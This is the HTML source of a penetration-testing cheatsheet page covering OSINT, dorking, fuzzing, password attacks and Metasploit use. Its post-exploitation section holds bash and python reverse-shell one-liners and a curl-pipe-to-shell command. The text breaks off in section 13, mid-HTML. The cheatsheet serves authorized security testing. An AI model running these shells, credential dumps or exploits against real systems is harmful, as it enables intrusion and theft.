index.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title data-i18n="mainTitle">Penetration Testing & Vulnerability Research — Robust Cheatsheet</title>
    
    <link href="https://fonts.googleapis.com/css2?family=IBM+Plex+Mono:wght@400;600&display=swap" rel="stylesheet">

    <meta name="description" content="A robust and comprehensive cheatsheet for penetration testing, vulnerability research, and ethical hacking commands across OSINT, Web, Network, Exploitation, and Reversing.">
    <meta name="keywords" content="penetration testing, ethical hacking, vulnerability research, cheatsheet, OSINT, Metasploit, Nmap, SQLi, XSS, reverse shell, bug bounty, cybersecurity commands, cloud security, docker, kubernetes">
    <meta name="author" content="Andrey Lopukhov">

    <meta name="robots" content="index, follow, noarchive">
    <meta name="googlebot" content="index, follow">
    <meta name="bingbot" content="index, follow">
    <meta name="yandex" content="index, follow">
    <style>
        /* CSS STYLES */
        :root{ 
            /* DEEP SPACE AESTHETIC COLORS */
            --bg: #10141b;             /* Deep Charcoal/Navy (Softer Black) */
            --card: #1c212b;           /* Slightly lighter Card Background */
            --muted: #e0e6f0;          /* Soft Off-White/Light Gray for Body Text */
            
            /* ACCENT COLORS */
            --accent: #4fc0eb;         /* Bright Electric Blue (Primary Accent) */
            --accent-glow: rgba(79, 192, 235, 0.4); /* Soft Blue Glow */
            --accent-2: #c084fc;       /* Soft Neon Purple (Secondary Accent) */
            --header: var(--accent);   /* Headers use the Electric Blue */
            
            --code-bg: #222a35;        /* Darker Blue-Gray Code Blocks */
            --border: #334050;         /* Subtle Border/Line Color */
            
            /* UPDATED: Brighter color for footer text */
            --footer-text-color: #8c98a8; /* A visible, medium-gray blue for the footer */
        }
        body{
            /* UPDATED FONT STACK */
            font-family: 'IBM Plex Mono', 'SFMono-Regular', Consolas, Monaco, monospace; 
            background:var(--bg);
            color:var(--muted);
            margin:0;
            padding:20px
        }
        .container{
            max-width:1100px;
            margin:0 auto;
            background:var(--card);
            padding:26px;
            border-radius:12px;
            box-shadow:0 0 25px var(--accent-glow);
        }
        h1{
            margin:0;
            color:var(--header);
            font-size:26px;
            text-shadow: 0 0 5px var(--accent-glow);
            font-weight: 600; /* Use 600 weight from Plex Mono */
        }
        h2{
            color:var(--header);
            font-size:1.4rem;
            margin-top:20px;
            border-left:4px solid var(--accent);
            padding-left:10px;
            cursor:pointer; 
            display: flex; 
            align-items: center; 
            justify-content: space-between;
            transition: color 0.2s;
        }
        h2:hover {
            color: var(--accent-2);
        }
        
        /* NEW STYLES for Header and Language Dropdown */
        .header-bar {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
            flex-wrap: wrap; 
            gap: 15px;
        }
        
        .share-buttons {
            display: flex;
            gap: 10px;
            align-items: center;
        }
        
        .social-icon {
            width: 32px;
            height: 32px;
            border-radius: 50%;
            background-color: var(--code-bg);
            display: flex;
            justify-content: center;
            align-items: center;
            color: var(--accent-2);
            text-decoration: none;
            font-size: 16px;
            transition: color 0.2s, background-color 0.2s, box-shadow 0.2s;
            border: 1px solid var(--border);
        }
        
        .social-icon:hover {
            color: var(--muted);
            background-color: var(--accent);
            box-shadow: 0 0 10px var(--accent-glow);
        }

        .lang-select-container {
            display: flex;
            align-items: center;
            gap: 10px;
            margin-left: auto;
        }
        
        .language-select {
            padding: 8px 10px;
            border-radius: 8px;
            border: 1px solid var(--accent);
            background: var(--code-bg);
            color: var(--accent);
            cursor: pointer;
            appearance: none;
            /* Updated SVG background image to use the new accent color (#4fc0eb) */
            background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='%234fc0eb' d='M9.293 12.95l.707.707L15.657 8l-1.414-1.414L10 10.828 5.757 6.586 4.343 8z'/%3E%3C/svg%3E");
            background-repeat: no-repeat;
            background-position: right 8px center;
            padding-right: 30px;
            font-size: 0.9rem;
            transition: border-color 0.2s;
        }
        .language-select:focus {
            outline: none;
            border-color: var(--accent-2); 
        }
        
        /* RTL adjustments for Hebrew */
        html[dir="rtl"] h2 {
            border-left: none;
            border-right: 4px solid var(--accent);
            padding-left: 0;
            padding-right: 10px;
            flex-direction: row-reverse;
        }
        html[dir="rtl"] h2 .chip-container { flex-direction: row-reverse; }
        html[dir="rtl"] h2 .chip { margin-left: 0; margin-right: 8px; }

        html[dir="rtl"] .lang-select-container {
            margin-left: 0;
            margin-right: auto;
        }
        
        html[dir="rtl"] .language-select {
            background-position: left 8px center;
            padding-left: 30px;
            padding-right: 10px;
        }
        
        html[dir="rtl"] .header-bar {
            flex-direction: row-reverse;
        }
        /* FIX for RTL: copy feedback is on the left */
        html[dir="rtl"] .copy-feedback { right: auto; left: 10px; }
        html[dir="rtl"] .warning {
            border-left: none;
            border-right: 4px solid var(--accent);
        }
        html[dir="rtl"] .toggle-icon { margin-right: auto; margin-left: 0; padding-right: 10px; padding-left: 0; }
        /* END RTL adjustments */

        /* PRE STYLES: Now clickable */
        pre{
            border-radius:8px;
            margin:10px 0;
            padding:14px;
            position:relative;
            background:var(--code-bg);
            overflow:auto;
            border:1px solid var(--border);
            cursor: copy; 
            transition: background-color 0.2s, box-shadow 0.2s, border-color 0.2s;
        }
        pre:hover {
            background: #2a3341;
            box-shadow: 0 0 8px var(--accent-glow);
            border-color: var(--accent);
        }
        
        /* === FIX: Ensure code aligns flush left and scrolls === */
        pre code {
            white-space: pre; /* Allows horizontal scroll for long commands */
            display: block; 
            margin: 0;
            padding: 0;
        }
        
        /* === NEW: The 'Copied!' feedback element === */
        .copy-feedback {
            position: absolute;
            right: 10px;
            top: 10px; 
            z-index: 10;
            background: var(--accent-2); 
            color: var(--bg); 
            border: none;
            padding: 4px 8px;
            border-radius: 4px;
            font-size: 12px;
            font-weight: bold;
            opacity: 0; 
            transition: opacity 0.3s;
            pointer-events: none; 
        }
        .copy-feedback.visible {
            opacity: 1; 
        }

        /* Hide old copy button if any stray ones exist */
        .copy-btn {
            display: none !important;
        }

        .warning{
            border:1px solid var(--accent);
            border-left:4px solid var(--accent);
            background:rgba(79, 192, 235, 0.09);
            color:var(--muted);
            padding:14px;
            border-radius:8px
        }
        .warning strong {
            color: var(--accent);
        }

        .section-desc{
            margin-top:-8px;
            margin-bottom:12px;
            font-style:italic;
            color:var(--accent-2);
            font-size: 0.95rem;
        }
        .command-desc{
            font-size:0.85rem;
            margin-top:3px;
            margin-bottom:10px;
            color:var(--accent);
            font-style:italic; 
            font-family:'IBM Plex Mono', 'SFMono-Regular', Consolas, Monaco, monospace;
        }
        
        .chip-container { display: flex; gap: 8px; }
        .chip{
            display:inline-block;
            background:rgba(79, 192, 235, 0.04);
            padding:4px 8px;
            border-radius:999px;
            color:var(--accent);
            border:1px solid rgba(79, 192, 235, 0.3);
            font-size:12px;
            cursor:default;
            transition: background-color 0.2s;
        }
        .chip:hover {
            background:rgba(79, 192, 235, 0.1);
        }

        #toggleAllButton{
            padding:12px;
            border-radius:8px;
            border:none;
            width: 100%; 
            margin-bottom: 20px; 
            font-weight: bold; 
            cursor: pointer; 
            background:rgba(79, 192, 235, 0.15);
            color: var(--accent);
            transition: background-color 0.2s;
        }
        #toggleAllButton:hover { 
            background: rgba(79, 192, 235, 0.25);
        }

        footer{
            margin-top:25px;
            /* Updated to the brighter color variable */
            color:var(--footer-text-color); 
            font-size:13px;
            text-align:center
        }
        footer a { 
            color: var(--accent); 
            text-decoration: none; 
            transition: color 0.2s;
        }
        footer a:hover {
            color: var(--accent-2);
        }
        
        /* EMOJI TOGGLE ICON */
        .toggle-icon { 
            margin-left: auto; 
            padding-left: 10px; 
            font-weight: bold; 
            font-size: 1.2rem;
        }
    </style>

    <link rel="icon" href="💻"> 
</head>
<body>

<div class="container">
    
    <div class="header-bar">
        <h1 data-i18n="mainTitle">Penetration Testing & Vulnerability Research — Robust Cheatsheet</h1>

        <div class="share-buttons">
            <a href="#" class="social-icon twitter" target="_blank" title="Share on X (Twitter)">
                <svg viewBox="0 0 24 24" aria-hidden="true" style="width: 18px; height: 18px; fill: currentColor;"><g><path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-6.234-8.73L4.36 21.75H.91L8.58 12.873.15 2.25h3.363l5.051 6.772L12.081 2.25h6.163zm-1.16 17.653l1.833-2.42-5.04-7.098L10.518 4.2h-1.574l6.095 8.53v.006L4.35 19.752h1.61z"/></g></svg>
            </a>
            <a href="#" class="social-icon linkedin" target="_blank" title="Share on LinkedIn">
                <svg viewBox="0 0 24 24" aria-hidden="true" style="width: 18px; height: 18px; fill: currentColor;"><path d="M20.447 20.452h-3.529v-5.556c0-1.319-.026-3.017-1.837-3.017-1.841 0-2.122 1.448-2.122 2.939v5.634H9.488V9.752h3.399v1.564h.047c.477-.9 1.638-1.838 3.359-1.838 3.58 0 4.249 2.373 4.249 5.46Z M5.043 8.356c-1.309 0-2.357-1.05-2.357-2.358S3.734 3.64 5.043 3.64c1.31 0 2.358 1.05 2.358 2.358s-1.048 2.358-2.358 2.358ZM6.764 20.452H3.336V9.752h3.428Z" fill-rule="evenodd"/></svg>
            </a>
             <a href="#" class="social-icon telegram" target="_blank" title="Share on Telegram">
                <svg viewBox="0 0 24 24" aria-hidden="true" style="width: 18px; height: 18px; fill: currentColor;"><path d="M11.999 0C5.373 0 0 5.373 0 12s5.373 12 12 12c6.627 0 12-5.373 12-12S18.627 0 12 0zm5.55 7.646c-.05-.282-.3-.518-.59-.61L4.795 4.545c-.386-.14-.732.148-.658.585l1.96 11.232c.07.41.36.7.74.838.38.14.793.003 1.05-.285l2.67-2.583 4.962 3.65c.343.253.64.12.744-.27.104-.39-.148-.688-.3-.83l-5.834-5.632 6.64-4.075c.376-.23.473-.59.336-.788"/></svg>
            </a>
            <a href="https://github.com/tripping-alien/HackersCheatsheet" class="social-icon github" target="_blank" title="View on GitHub">
                <svg viewBox="0 0 24 24" aria-hidden="true" style="width: 18px; height: 18px; fill: currentColor;"><path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.6.11.82-.26.82-.577 0-.285-.01-1.047-.015-2.056-3.338.723-4.032-1.61-4.032-1.61-.544-1.38-1.328-1.75-1.328-1.75-1.087-.74.083-.725.083-.725 1.205.085 1.838 1.238 1.838 1.238 1.065 1.833 2.793 1.303 3.475.996.108-.775.419-1.303.762-1.605-2.665-.3-5.467-1.332-5.467-5.93 0-1.31.465-2.383 1.235-3.22-.12-.3-.532-1.523.11-3.176 0 0 1.008-.322 3.301 1.23a11.51 11.51 0 0 1 3-.404c1.026 0 2.054.136 3.001.404 2.29-1.552 3.297-1.23 3.297-1.23.642 1.653.23 2.876.12 3.176.77.837 1.235 1.91 1.235 3.22 0 4.61-2.805 5.625-5.476 5.922.43.37.81 1.096.81 2.21 0 1.6-.015 2.894-.015 3.284 0 .315.22.69.825.576C20.565 21.79 24 17.3 24 12c0-6.627-5.373-12-12-12z"/></svg>
            </a>
        </div>
        
        <div class="lang-select-container">
            <select id="languageSelect" class="language-select">
                <option value="en">English</option>
                <option value="ru">Русский (Russian)</option>
                <option value="he">עברית (Hebrew)</option>
                <option value="fr">Français (French)</option>
                <option value="de">Deutsch (German)</option>
            </select>
        </div>
    </div>
    <button id="toggleAllButton" data-i18n="toggleButtonCollapsed">Expand All</button>

    <div class="warning">
        <strong data-i18n="warningTitle">⚠️ AUTHORIZED USE ONLY</strong>
        <p data-i18n="warningBody">Run these commands only in lab environments or on targets you have explicit written permission to test.</p>
    </div>

    <div class="section-container">
        <h2 class="section-header" data-i18n="section1Title" data-target="section-1">
            1) Recon & OSINT
            <span class="chip-container"><span class="chip">OSINT</span><span class="chip">Recon</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section1Desc">Footprinting, WHOIS, DNS lookups, and passive certificate data gathering.</p>
        <div id="section-1" class="section-content">
            <p class="command-desc" data-i18n="section1CommandDesc">Commands gather domain info, DNS records, HTTP headers, and passive certificate/host data.</p>
            
            <p class="command-desc"># Set target</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>TARGET=example.com
</code></pre>

            <p class="command-desc">WHOIS lookup</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>whois $TARGET
</code></pre>

            <p class="command-desc">DNS: A + MX + NS records</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>dig +noall +answer $TARGET A
dig +noall +answer $TARGET MX
dig +noall +answer $TARGET NS
</code></pre>

            <p class="command-desc">HTTP headers check</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>curl -I -L --max-redirs 5 https://$TARGET
</code></pre>

            <p class="command-desc">Certificate names (crt.sh)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>curl -s "https://crt.sh/?q=%25.$TARGET&output=json" | jq -r '.[].name_value' | sort -u
</code></pre>

            <p class="command-desc">Passive OSINT (AUTHORIZED USE ONLY)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>theharvester -d example.com -b google,bing,linkedin -l 500
shodan host 1.2.3.4
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section2Title" data-target="section-2">
            2) Recon: Search Engine Dorking & Exposed Assets
            <span class="chip-container"><span class="chip">OSINT</span><span class="chip">Dorking</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section2Desc">Using advanced search operators (Dorks) on Google, Bing, and Yandex to discover exposed files, directories, and misconfigurations.</p>
        <div id="section-2" class="section-content">
            <p class="command-desc" data-i18n="section2CommandDesc">These dorks work across all major search engines and are crucial for external reconnaissance.</p>
            
            <p class="command-desc"># Find sensitive files (.pdf, .xls) on target domain</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>site:target.com filetype:pdf confidential
site:target.com filetype:xls password
</code></pre>

            <p class="command-desc">Find public login/admin panels</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>intitle:"login page" inurl:admin site:target.com
</code></pre>

            <p class="command-desc">Find exposed configuration or log files</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>inurl:wp-config.php OR inurl:.env filetype:txt
intitle:"index of /" log
</code></pre>

            <p class="command-desc">Find cached pages to check for old data exposure</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>cache:https://target.com/page-with-old-data
</code></pre>

            <p class="command-desc">Restrict results to a specific file type AND title match</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>intitle:"report" filetype:docx site:target.com
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section3Title" data-target="section-3">
            3) Cloud & Infrastructure Recon (AWS/Azure)
            <span class="chip-container"><span class="chip">Cloud</span><span class="chip">OSINT</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section3Desc">Searching for exposed cloud assets, S3 buckets, Azure blob storage, and DNS configuration flaws.</p>
        <div id="section-3" class="section-content">
            <p class="command-desc" data-i18n="section3CommandDesc">Checking common cloud storage misconfigurations and DNS records pointing to cloud services.</p>

            <p class="command-desc"># Google Dork: Exposed S3 Buckets</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>site:s3.amazonaws.com inurl:target-bucket-name
</code></pre>

            <p class="command-desc">Google Dork: Azure Blob Storage</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>site:blob.core.windows.net target-company-name
</code></pre>

            <p class="command-desc">DNS Check: AWS S3 Takeover vulnerability (CNAME pointing to non-existent bucket)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>dig CNAME target.com | grep s3.amazonaws.com
</code></pre>
            
            <p class="command-desc">Checking for exposed API Keys/Credentials in public source code repos (GitHub Dork)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>"AKIA" OR "aws_secret_access_key" OR "client_secret" filename:.env
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section4Title" data-target="section-4">
            4) Subdomain & DNS Enumeration
            <span class="chip-container"><span class="chip">DNS</span><span class="chip">Subdomain</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section4Desc">Discovering subdomains and advanced DNS records using specialized tools.</p>
        <div id="section-4" class="section-content">
            <p class="command-desc" data-i18n="section4CommandDesc">Uses Amass and Subfinder for comprehensive target scope, combining passive and active sources.</p>
            
            <p class="command-desc"># Amass (passive + active + brute)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>amass enum -d example.com -o amass.txt
</code></pre>

            <p class="command-desc">Subfinder (fast passive)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>subfinder -d example.com -o subfinder.txt
</code></pre>

            <p class="command-desc">DNS recon</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>dnsrecon -d example.com -t std,brt,srv
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section5Title" data-target="section-5">
            5) Network & Directory Services (SMB/AD)
            <span class="chip-container"><span class="chip">Network</span><span class="chip">AD</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section5Desc">Aggressive port scanning, service versioning, and initial enumeration of domain services (SMB, LDAP).</p>
        <div id="section-5" class="section-content">
            <p class="command-desc" data-i18n="section5CommandDesc">The Nmap command is a safe, thorough pattern; specific checks for Active Directory/Windows services are included.</p>
            
            <p class="command-desc"># Nmap (version, default scripts, full ports)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>nmap -sC -sV -p- -T4 --min-rate 1000 -oA nmap-full 192.0.2.0/24
</code></pre>

            <p class="command-desc">SMB Share Enumeration (lab only)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>smbclient -L //192.0.2.10 -N
</code></pre>
            
            <p class="command-desc">LDAP/Kerberos Service Check (Nmap script)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>nmap -p 88,389,445 --script=krb5-enum-users --script-args userdb=users.txt 192.0.2.10
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section6Title" data-target="section-6">
            6) Web Discovery & Fuzzing (APIs/Content)
            <span class="chip-container"><span class="chip">Web</span><span class="chip">Fuzzing</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section6Desc">Bruteforcing directories, files, virtual hosts, and API endpoints for hidden functionality.</p>
        <div id="section-6" class="section-content">
            <p class="command-desc" data-i18n="section6CommandDesc">Uses ffuf and gobuster for content discovery, including API endpoint discovery patterns.</p>
            
            <p class="command-desc"># ffuf (directory/file fuzzing)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302 -o ffuf.json
</code></pre>

            <p class="command-desc">gobuster (API endpoint discovery)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>gobuster dir -u https://api.example.com/v1/ -w /usr/share/wordlists/api-endpoints.txt -o api-gobust.txt
</code></pre>
            
            <p class="command-desc">ffuf (VHost fuzzing)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>ffuf -w /usr/share/wordlists/subdomains-top1mil.txt -H "Host: FUZZ.example.com" -u https://example.com/ -o vhost.json
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section7Title" data-target="section-7">
            7) Web Application & API Security Testing
            <span class="chip-container"><span class="chip">Webapp</span><span class="chip">API</span><span class="chip">SQLi</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section7Desc">Quick vulnerability checks for SQLi, XSS, SSRF, and API parameter enumeration.</p>
        <div id="section-7" class="section-content">
            <p class="command-desc" data-i18n="section7CommandDesc">Tools for checking common OWASP Top 10 flaws and API layer diagnostics. **Lab use only.**</p>
            
            <p class="command-desc"># nikto (webserver checks)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>nikto -h https://example.com -output nikto.txt
</code></pre>

            <p class="command-desc">sqlmap (SQL Injection - ONLY in-scope & lab)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>sqlmap -u "https://example.com/vuln.php?id=1" --batch --dbs
</code></pre>
            
            <p class="command-desc">SSRF (Server-Side Request Forgery) check (using Burp Collaborator/Interact.sh payload)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>curl -X POST -d '{"url":"http://collaborator.net/test"}' https://api.example.com/endpoint
</code></pre>

            <p class="command-desc">parameter discovery (Arjun)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>arjun -u "https://example.com/page" -o arjun.txt
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section8Title" data-target="section-8">
            8) Vulnerability Scanning & SCA (Open Source)
            <span class="chip-container"><span class="chip">CVE</span><span class="chip">SBOM</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section8Desc">Automated vulnerability template scanning, SBOM generation, and dependency analysis for open source risks.</p>
        <div id="section-8" class="section-content">
            <p class="command-desc" data-i18n="section8CommandDesc">Uses open-source tools for infrastructure scanning (Nuclei) and dependency analysis (Syft/Grype).</p>
            
            <p class="command-desc"># nuclei (fast templates)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>nuclei -l hosts.txt -t cves/ -o nuclei_results.txt
</code></pre>

            <p class="command-desc">syft -> generate SBOM (Software Bill of Materials)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>syft packages dir:./project -o cyclonedx-json > sbom.json
</code></pre>

            <p class="command-desc">grype -> scan SBOM (checks CVEs against known dependencies)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>grype sbom:sbom.json
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section9Title" data-target="section-9">
            9) Passwords & Credentials Tooling (AD/Kerberos)
            <span class="chip-container"><span class="chip">Passwords</span><span class="chip">AD</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section9Desc">Online bruteforce (authorized only), offline hash cracking, and Active Directory enumeration tools (Kerberoasting, secretsdump).</p>
        <div id="section-9" class="section-content">
            <p class="command-desc" data-i18n="section9CommandDesc">Standard tools for credential testing, hash cracking, and AD environment assessment.</p>
            
            <p class="command-desc"># hydra (online bruteforce) - AUTHORIZED ONLY</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>hydra -L users.txt -P passwords.txt -t 4 ssh://192.0.2.10 -o hydra-ssh.txt
</code></pre>

            <p class="command-desc">hashcat (offline cracking - fast)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>hashcat -m 1000 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt
</code></pre>

            <p class="command-desc">impacket (extract Windows hashes)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>python3 /opt/impacket/examples/secretsdump.py domain/USER:PASS@192.0.2.10 -outputfile secrets
</code></pre>

            <p class="command-desc">AS-REP Roasting (get unauthenticated Kerberos hashes)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -format hashcat
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section10Title" data-target="section-10">
            10) Exploitation: Metasploit & Exploit Consoles
            <span class="chip-container"><span class="chip">Exploit</span><span class="chip">MSF</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section10Desc">Core Metasploit commands for searching, configuring, and executing exploits. **Lab use only.**</p>
        <div id="section-10" class="section-content">
            <p class="command-desc" data-i18n="section10CommandDesc">A template workflow for using auxiliary and exploit modules in the Metasploit console.</p>
            
            <p class="command-desc"># start msfconsole</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>msfconsole
</code></pre>

            <p class="command-desc">search and use exploit</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>search cve:2017-0143
use exploit/windows/smb/ms17_010_eternalblue
</code></pre>

            <p class="command-desc">set options and check</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>set RHOSTS 192.168.1.0/24
set PAYLOAD windows/meterpreter/reverse_tcp
check
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section11Title" data-target="section-11">
            11) Post-Exploitation: Reverse Shells & Enumeration
            <span class="chip-container"><span class="chip">Shell</span><span class="chip">Privesc</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section11Desc">Listener commands, common reverse shell one-liners, and local privilege escalation helpers. **Lab use only.**</p>
        <div id="section-11" class="section-content">
            <p class="command-desc" data-i18n="section11CommandDesc">Essential commands for establishing remote access and host reconnaissance.</p>
            
            <p class="command-desc"># netcat listener (catch reverse shells)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>nc -lvnp 4444
</code></pre>

            <p class="command-desc">bash reverse shell</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
</code></pre>

            <p class="command-desc">python reverse shell (stable)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
</code></pre>

            <p class="command-desc">linux enumeration (LinPEAS)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>curl -sL https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh | sh
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section12Title" data-target="section-12">
            12) Network & TLS Checks
            <span class="chip-container"><span class="chip">Network</span><span class="chip">TLS</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section12Desc">Traffic capture, packet analysis, and SSL/TLS configuration checks.</p>
        <div id="section-12" class="section-content">
            <p class="command-desc" data-i18n="section12CommandDesc">Commands for network diagnostics and assessing the cryptographic strength of web endpoints.</p>
            
            <p class="command-desc"># tcpdump (capture 1000 packets on eth0)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>tcpdump -i eth0 -w capture.pcap -c 1000
</code></pre>

            <p class="command-desc">tshark read (filter HTTP)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>tshark -r capture.pcap -Y "http" -T fields -e http.host -e http.request.uri
</code></pre>

            <p class="command-desc">sslyze (comprehensive TLS scan)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>sslyze --regular example.com:443
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section13Title" data-target="section-13">
            13) Vulnerability Research & PoC Triage
            <span class="chip-container"><span class="chip">VulnRes</span><span class="chip">PoC</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section13Desc">Searching local exploit databases and safely running proof-of-concept code in isolation.</p>
        <div id="section-13" class="section-content">
            <p class="command-desc" data-i18n="section13CommandDesc">Emphasizes local search (searchsploit) and the use of network-isolated containers to prevent lateral movement.</p>
            
            <p class="command-desc"># searchsploit</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>searchsploit "CVE-2021-44228"
searchsploit -m 49993 # copy exploit by EDB ID
</code></pre>

            <p class="command-desc">run PoC inside an isolated, no-network container (safest approach)</p>
            <pre class="command-block">
